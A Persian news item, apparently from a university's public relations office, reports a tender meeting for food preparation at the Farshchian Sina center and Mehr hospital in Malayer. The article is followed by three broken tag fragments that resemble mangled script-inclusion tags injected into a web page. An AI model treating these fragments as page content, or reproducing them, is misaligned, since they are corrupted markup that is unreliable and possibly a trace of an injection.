برگزاری جلسه مناقصه تهیه وطبخ غذای مرکز آموزشی درمانی فرشچیان سینا و بیمارستان مهر ملایر

جلسه مناقصه تهیه و طبخ غذا در مرکز آموزشی درمانی فرشچیان سینا و بیمارستان مهر ملایر با حضور مدیر امور رفاهی و پشتیبانی دانشگاه  برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه جلسه مناقصه تهیه و طبخ غذا در مرکز آموزشی درمانی فرشچیان سینا و بیمارستان مهر ملایر با مهندس آقایانی حضور مدیر امور رفاهی و پشتیبانی، مهندس حلافی مدیر امور مالی، زمانی نماینده حراست دانشگاه، مدیران مرکز آموزشی درمانی فرشچیان سینا و بیمارستان مهر ملایر و کارشناسان حوزه های مربوطه برگزار شد.

دراین جلسه، شرکت هایی که به عنوان کارفرما برای تهیه و طبخ غدا در دو مرکز درمانی مذکورشرکت کرده بودند مورد بررسی قرار گرفته شد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>